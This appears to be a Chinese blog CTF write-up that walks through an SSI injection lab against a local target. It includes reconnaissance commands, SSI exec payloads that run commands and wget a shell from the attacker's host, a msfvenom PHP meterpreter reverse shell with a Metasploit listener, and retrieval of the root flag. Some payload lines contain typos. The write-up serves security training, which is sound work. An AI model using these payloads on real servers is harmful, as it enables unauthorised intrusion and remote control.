CTF-12.web安全SSI注入

SSl注入攻击介绍

SSl(server side inject)的出现是为了赋予html静态页面动态的效果,通过ssI来执行系统命令,并返回对应的结果。

如果在网站目录中发现了.stm, .shtm .shtml,并且网站对于SSI的输入没有做到严格过滤,很有可能被SSl注入攻击。

实验环境
攻击机: kali 192.168.1.103
靶场机器: linux 192.168.1.106

信息探测

扫描主机服务信息以及服务版本
– nmap -sV靶场lP地址
在这里插入图片描述

快速扫描主机全部信息
–nmap -T4 一A -v 靶场lP地址

探测敏感信息

nikto -host http://靶场IP地址:端口
在这里插入图片描述
dirb http://靶场IP地址:端口
在这里插入图片描述

深入挖掘

分析nmap .nikto扫描结果,并对结果进行分析,挖掘可以利用的信息;
在这里插入图片描述

使用浏览器打开http://ip:port/敏感页面,查看敏感信息,找到可利用的位置;
在这里插入图片描述

漏洞利用ssi

根据提示来利用对应ssL注入漏洞

列举当前目录中的文件和目录<l-#exec cmd=“Is” -->

切换到指定目录

<!--#exec cmd="cd /root/dir">

下载shell脚本并重命名为shell.php

<!--#exec cmd="wget http://ip/shell.txt | rename shell.txt shell.php" ->

制作webshell

msfvenom -p php/meterpreter/reverse_tcp lhost=攻击机IP地址 lport=4444 -f raw >/root/Desktop/shell.php
在这里插入图片描述

启动监听

在这里插入图片描述

msf > use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 攻击机IP地址
msf exploit(handler) > set lport 4444
msf exploit(handler) > run

在这里插入图片描述
将生成的shell移动到apache的根目录下
在这里插入图片描述
在这里插入图片描述
可以在靶场上提交脚本
在这里插入图片描述

<!--#exec cmd="wget http://192.168.1.103/shell.py"-->

在这里插入图片描述
出现下面界面下载成功
在这里插入图片描述
给shell赋对应的权限。
在这里插入图片描述
在进行运行
在这里插入图片描述
点击提交之后网页会卡住,这时可以查看kali
在这里插入图片描述

执行操作

sysinfo查看系统信息
shell进入系统shell
在这里插入图片描述

优化终端python -c ‘import pty;pty.spawn( "/bin/bash”)’
在这里插入图片描述

获取Flag

一般情况下,靶场机器的flag值是存放在服务器的根目录下,/root/目录。
cd / root/
ls
cat flag

writeup 测试文档总结文档

总结:

在ctf比赛中,对于ssi漏洞服务器具有很多过滤机制,我们需要对其进行绕过,比如大小写;

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wow2ok

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值